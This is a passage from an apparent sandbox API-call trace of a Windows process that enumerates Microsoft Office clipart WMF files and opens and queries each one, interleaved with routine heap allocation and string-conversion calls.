dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0101.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0101.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.749] AreFileApisANSI () returned 1 [0101.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0101.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.749] AreFileApisANSI () returned 1 [0101.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ab20 [0101.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 69 [0101.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.750] GetFileType (hFile=0x33c) returned 0x1 [0101.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0101.750] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.750] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.750] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.750] CloseHandle (hObject=0x33c) returned 1 [0101.750] AreFileApisANSI () returned 1 [0101.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0101.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 69 [0101.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.751] GetFileType (hFile=0x33c) returned 0x1 [0101.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0101.751] CloseHandle (hObject=0x33c) returned 1 [0101.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0101.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0101.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0101.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0101.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0101.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0101.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.752] AreFileApisANSI () returned 1 [0101.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0101.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 69 [0101.752] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc89dc9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc89dc9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd14)) returned 1 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0101.753] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.753] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.753] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc63b1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc63b1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10c8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04332_.WMF", cAlternateFileName="")) returned 1 [0101.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0101.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0101.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0101.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0101.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0101.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0101.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f0b8 [0101.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0101.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0101.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0101.753] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.753] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.753] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.754] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0101.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.754] AreFileApisANSI () returned 1 [0101.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0101.754] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.754] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.754] AreFileApisANSI () returned 1 [0101.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0101.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 69 [0101.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.754] GetFileType (hFile=0x33c) returned 0x1 [0101.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0101.755] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.755] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.755] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.755] CloseHandle (hObject=0x33c) returned 1 [0101.755] AreFileApisANSI () returned 1 [0101.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a2d0 [0101.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 69 [0101.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.755] GetFileType (hFile=0x33c) returned 0x1 [0101.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0101.756] CloseHandle (hObject=0x33c) returned 1 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0101.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0101.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.757] AreFileApisANSI () returned 1 [0101.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a9f0 [0101.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8a9f0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 69 [0101.757] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc63b1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc63b1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10c8)) returned 1 [0101.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0101.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0101.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.757] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc63b1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc63b1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, 